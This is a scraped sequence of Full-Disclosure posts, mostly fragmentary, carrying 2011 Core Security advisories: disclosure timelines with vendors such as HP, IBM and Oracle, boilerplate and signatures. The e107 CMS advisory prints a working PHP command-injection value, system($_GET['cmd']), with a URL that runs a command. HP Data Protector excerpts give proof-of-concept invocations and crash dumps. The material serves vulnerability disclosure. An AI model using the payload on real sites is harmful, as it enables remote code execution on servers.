advisory CORE-2011-0825 is published. 10. *References* [1] Security bulletin for Adobe Shockwave Player http://www.adobe.com/support/security/bulletins/apsb11-27.html [2] Upgrade Adobe Shockwave Player http://get.adobe.com/shockwave/ 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk65nI4ACgkQyNibggitWa3r4QCfTQBWDnGgU2zU5VIsav0W7rVi ggwAoLEFRsdGblP/tEZKyAry8BDtw4Em =EZuR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0810 - E107 CMS Script Command Injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ e107 CMS Script Command Injection 1. *Advisory Information* Title: e107 CMS Script Command Injection Advisory ID: CORE-2011-0810 Advisory URL: http://www.coresecurity.com/content/e107-cms-script-command-injection Date published: 2011-10-24 Date of last update: 2011-10-24 Vendors contacted: e107 Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1513 3. *Vulnerability Description* When the install script for e107 CMS has not been removed, an attacker can "reinstall" the application using arbitrary parameters. If the attacker puts a valid MySql server followed a semicolon and PHP code, this will be executed when the config file gets requested. This parameters are stored in the config file "e107_config.php". 4. *Vulnerable packages* . e107 0.7.24 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* e107's team has issued patch for this issue in the revision 12375 [1] of its SVN repository. Also the development version of e107 was patched in the revision 12376 [2] 6. *Credits* This vulnerability was discovered and researched by Matt Bergin and Matias Blanco. The publication of this advisory was coordinated by Fernando Russ. 7. *Technical Description / Proof of Concept Code* A possible value for the MySql parameter could be: /- localhost:63306';system($_GET['cmd']);$a='1 - -/ Then, when the e107_config.php page is requested like this http://www.example.com/e107_config.php?cmd=id, the command id is going to be executed. 8. *Report Timeline* . 2011-10-03: Technical details sent to the Vendor. . 2011-10-03: The e107 security team asks Core for a technical description of the vulnerability. . 2011-10-03: Core sends the technical description of the vulnerability . 2011-10-21: The e107 security team reports that the vulnerability was fixed. And is now live in the SVN for wider testing. (changeset 12375 and changeset 12376) . 2011-10-21: Core provides the CVE for this vulnerability. . 2011-10-24: Advisory CORE-2011-0810 is published. 9. *References* [1] SVN reference to the patch for this issue in e107 (v0.7) http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12375 [2] SVN reference to the patch for this issue in e107 (v0.8) (devel) http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12376 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk6ljIgACgkQyNibggitWa113wCeISjoKNw2ab7IgWEJyvf3uU3U qIEAoJspzi1JyLPBaD9VrKUxJ2gmzr6H =UtMA -END PGP SIGNATURE- __
[Full-disclosure] CORE-2011-0106: Microsoft Publisher 2007 Pubconv.dll Memory Corruption
ishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk6Vy/QACgkQyNibggitWa2TvgCgma9wKGM0AtLP5zxwjHVnUjXr P0UAn2l4X7d9JJm9JYa+lAYG1hPPYl4w =wGj/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
e solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0526 - MS WINS ECommEndDlg Input Validation Error
clude problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
t.0041D1F7 [...] 0041D1F7 |> 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C] 0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX] 0041D1FD |. 85C9 |TEST ECX,ECX 0041D1FF |. 74 26 |JE SHORT omniinet.0041D227 0041D201 |. 8B55 08|MOV EDX,DWORD PTR SS:[EBP+8] 0041D204 |. 8955 FC|MOV DWORD PTR SS:[EBP-4],EDX 0041D207 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8] 0041D20A |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C] 0041D20D |. 66:8B11|MOV DX,WORD PTR DS:[ECX] 0041D210 |. 66:8910|MOV WORD PTR DS:[EAX],DX // copy WORDs to the stack 0041D213 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8] 0041D216 |. 83C0 02|ADD EAX,2 0041D219 |. 8945 08|MOV DWORD PTR SS:[EBP+8],EAX 0041D21C |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C] 0041D21F |. 83C1 02|ADD ECX,2 0041D222 |. 894D 0C|MOV DWORD PTR SS:[EBP+C],ECX 0041D225 |.^EB D0 \JMP SHORT omniinet.0041D1F7 0041D227 |> 8B55 08MOV EDX,DWORD PTR SS:[EBP+8] 0041D22A |. 66:C702 MOV WORD PTR DS:[EDX],0 0041D22F |. 8B45 FCMOV EAX,DWORD PTR SS:[EBP-4] 0041D232 |. 8BE5 MOV ESP,EBP 0041D234 |. 5D POP EBP 0041D235 \. C3 RETN - -/ 9. *Report Timeline* . 2011-06-06: Core Security Technologies notifies the HP team of the vulnerabilities and provides the technical details. Publication date is temporarily set to July 5th, 2011. . 2011-06-06: Vendor confirms that a new case was assigned within HP Software Security Response Team (SSRT). . 2011-06-16: Core requests an update on this issue, in particular Core asks the vendor for a technical analysis of the bugs, a list of affected products and versions, and the vendor's plan for providing a fix (no reply received). . 2011-06-23: Core requests once more an update. . 2011-06-28: Vendor communicates that a security bulletin will be issued on the same day (June 28). The vendor confirms the vulnerabilities, and recommends as mitigation to enable encrypted communications in the cell server and client. . 2011-06-28: Core requests a link to the vendor's bulletin, and asks whether CVE ids have been assigned. . 2011-06-28: Vendor provides a link to the bulletin and CVE names for the vulnerabilities. . 2011-06-29: Advisory CORE-2011-0606 is published. 10. *References* [1] HP Data Protector http://hp.com/go/dataprotector [2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay EAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo =zHon -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector
.* [CVE-2011-1865] This vulnerability is reproduced with the following command: "poc.py 127.0.0.1 46 1 30 17" A stack overflow is produced by calling the function swprintf from position 0x0040A708. 8.6. *Vulnerability 6. Opcode 27.* [CVE-2011-1865] This vulnerability is reproduced with the following command: "poc.py 127.0.0.1 27 1 30 3" A stack overflow is produced by calling the function swprintf from position 0x0040AD53. 8.7. *Vulnerabilidad 7. Opcode 17.* [CVE-2011-1865] This vulnerability is reproduced with the following command: "poc.py 127.0.0.1 17 1 30 6" A stack overflow is produced by calling the function swprintf from position 0x0040FC05. 8.8. *Vulnerability 8. Opcode 11.* [CVE-2011-1514] This vulnerability is reproduced with the following command: "poc.py 127.0.0.1 11 1 7 6" This causes a null pointer dereference. /- eax=0014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 edi= eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212 omniinet+0x7ed0: 00407ed0 8b10 mov edx,[eax] ds:0023:0014= 007cdd8c 0041143e 00156490 omniinet+0x7ed0 007cea3c 0040892b 0001 0046b9f0 omniinet+0x1143e 007cf4b8 00408f02 00156490 omniinet+0x892b 007cf518 0040a42c 7ad5f7f9 omniinet+0x8f02 007cffa0 77df352b 0001 00156498 0012e7f8 omniinet+0xa42c 007cffb4 7c80b713 00156490 0012e7f8 ADVAPI32!CryptVerifySignatureW+0x29 007cffec 77df3519 00156490 kernel32!GetModuleFileNameA+0x1b4 - -/ 8.9. *Vulnerability 9. Opcode 20.* [CVE-2011-1515] This vulnerability is reproduced with the following command: "poc.py 127.0.0.1 20 1 7 6" The process terminates without generating an exception, resulting in a denial of service condition. 9. *Report Timeline* . 2011-06-02: Core Security Technologies notifies HP Security Alert team of the vulnerabilities. Publication date is temporarily set to July 5th, 2011. . 2011-06-06: Vendor acknowledges receipt. . 2011-06-06: Core sends technical details to the vendor. . 2011-06-06: Vendor confirms that a new case was assigned within HP Software Security Response Team (SSRT). . 2011-06-16: Core requests an update on this issue, in particular Core asks the vendor for a technical analysis of the bugs, a list of affected products and versions, and the vendor's plan for providing a fix (no reply received). . 2011-06-23: Core requests once more an update. . 2011-06-28: Vendor communicates that a security bulletin will be issued on the same day (June 28). The vendor confirms the vulnerabilities, and recommends as mitigation to enable encrypted communications in the cell server and client. . 2011-06-28: Core requests a link to the vendor's bulletin, and asks whether CVE ids have been assigned. . 2011-06-28: Vendor provides a link to the bulletin and CVE names for the vulnerabilities. . 2011-06-29: Advisory CORE-2011-0514 is published. 10. *References* [1] HP Data Protector http://hp.com/go/dataprotector [2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commerc
[Full-disclosure] CORE-2010-1021: IBM WebSphere Application Server Cross-Site Request Forgery
11-02-17: Core replies that it has rescheduled publication of its advisory (for the second time) to March 21, 2011, in order to give PSIRT more time to come up with concrete responses to the requested information. Core provides additional information about its own publication process [5]. Without additional information, it is difficult for Core to understand the reason why users of vulnerable WebSphere software should remain without any solution until Q3 2011. . 2011-03-17: After 1 month of silence, the vendor informs Core that IBM's point of contact for this issue has changed, and that further communications will be handled by the head of IBM's Secure By Design initiative which includes the IBM PSIRT. . 2011-03-17: Vendor requests Core to postpone the publication of its advisory until early October 2011. . 2011-03-18: Vendor communicates that since Core hasn't responded to the request (sent the previous day) of deferring the public disclosure of this security vulnerability from 21 March to early October 2011, IBM considers that Core agrees. . 2011-03-21: Core answers that October 2011 is well beyond what it considers a reasonable timeframe to patch the type of bug that it has reported (a Cross-Site Request Forgery). Additionally the vendor didn't provide Core a technical analysis of the bug, explaining the difficulty to patch it (and why it would take IBM around 10 months to release fixes). The vendor didn't provide either the requested list of affected products and versions. According to Core's publication policy, the decision of postponing the publication of an advisory cannot be taken without technical arguments that justify that decision. This is why Core cannot agree with IBM's request to postpone publication until October 2011, unless the requested technical information is provided by the vendor. (No reply received.) . 2011-04-25: Core communicates the vendor that it has rescheduled the publication of its advisory to June 14th, 2011. That date corresponds to a 6 month timeframe after technical details about this vulnerability were sent to IBM (on December 14th, 2010), and is considered final. (No reply received.) . 2011-06-15: The advisory CORE-2010-1021 is published. 10. *References* [1] IBM WebSphere Application Server: http://www-01.ibm.com/software/webservers/appserv/was/ [2] Cross-Site Request Forgery (CSRF) http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 [3] Application Boundaries Enforcer (ABE) http://noscript.net/abe/ [4] The author participated in Core Security's Bugweek 2010 as member of the team "Ex Tester fuErTes and Exploit Testers". [5] Finding bugs and publishing advisories _ the Core Security way http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories [6] IBM WebSphere Reference, Global Security settings: http://publib.boulder.ibm.com/infocenter/wasinfo/fep/topic/com.ibm.websphere.nd.multiplatform.doc/info/ae/ae/usec_secureadminappinfra.html 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk35HjUACgkQyNibggitWa167gCfXeOi6AS7D37B3KCKs6Jcj1s+ zvIAn0siKkTeoI98lg6ng54dX78N4Vwd =rWih -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0203 - MS HyperV Persistent DoS Vulnerability
pating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web \ at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0908: Lotus Notes XLS viewer malformed BIFF record heap overflow
vendor's plan to produce fixes. Publication of Core's advisory is rescheduled for May 23rd, 2011. . 2011-04-28: Vendor replies that it will provide an update by the end of the week. . 2011-05-04: Vendor requests targeting May 24th for the publication of this vulnerability. . 2011-05-04: Core agrees to reschedule for May 24th, requests a list of vulnerable versions, and offers to include a vendor statement in its advisory. . 2011-05-19: Vendor replies that it is preparing an advisory which will outline the fixes and options available. Vendor states that this vulnerability would impact all current releases. Vendor asks whether a CVE has been assigned to the vulnerability. . 2011-05-20: Core provides the CVE name assigned to the issue, and requests additional information to be included in its advisory. . 2011-05-24: Vendor provides a link to its security alert, which includes information about fixes and workarounds. . 2011-05-24: The advisory CORE-2010-0908 is published. 10. *References* [1] Core Security Bugweek http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3cILkACgkQyNibggitWa1JXACfZhYfedrWImwvET8EoDXLaXT3 4UQAn1GqSKPazSFLZ15cWDD+JdkgtLif =P9PQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0204: Adobe Audition vulnerability processing malformed session file
copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg 6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d =EybH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1118: Oracle GlassFish Server Administration Console Authentication Bypass
racle notifies that: . This issue affects Sun GlassFish Enterprise Server 2.1.1 and Oracle GlassFish Server 3.0.1. . Oracle GlassFish Server 3.1 was released in March 2011 and was fixed before the release, so it is not affected. . The fix review, integration, test and release cycles run on predetermined schedules. Oracle is not delaying any fixes. . As a policy, Oracle does not provide workarounds unless they can be easily applied by every customer. . Fixes have been integrated; all the final patches should be available in July. . 2011-05-05: Core decides to release the advisory next Wednesday, May 11th; and notifies the sequence of events that has motivated that decision: . Oracle was notified of the vulnerability 5 month ago. . Oracle released a fixed version of GlassFish (March 2011) without notifying Core, without patching previous versions and without publishing any workaround for affected users. . Core has a workaround that mitigates the vulnerability. Core sends the proposed workaround [Sec. 6.1] to the Oracle Team and asks if they want to add further information in the advisory. . 2011-05-06: Oracle requests Core to hold the advisory publication until they have patches available for all customers. Oracle states that they announce security fixes on a pre-determined schedule, so users are prepared to apply them. Adhoc publication of issues may not allow every customer to monitor and apply patches in time, which increases their exposure. . 2011-05-09: Core notifies that the publication of security advisories is aimed at explaining the problem to the vulnerable user community and providing the technical details and guidance so they can devise protection countermeasures. Core usually releases this information in coordination with the vendor, but in this case this is not possible because Oracle has already released patches for some versions (without notifying Core). Currently, there is a patched version of GlassFish and there are vulnerable versions with exposed users. In this scenario, Core has decided to release the advisory as 'user 'release' next Wednesday, providing a way to mitigate the problem until patches are available. The vendor (Oracle in this case) may or may not agree with Core assessment on how to help users to reduce risk, but the vendor is certainly not the only party entitled to provide plausible solutions to the problem. . 2011-05-11: Advisory CORE-2010-1118 is published. 10. *References* [1] http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html [2] http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3LEs0ACgkQyNibggitWa0xHwCfbxae3OXevZBQsTIVTvCk8A24 NJcAniSAW+b9R/XylVhdNeqszjj7v0p/ =LfGA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
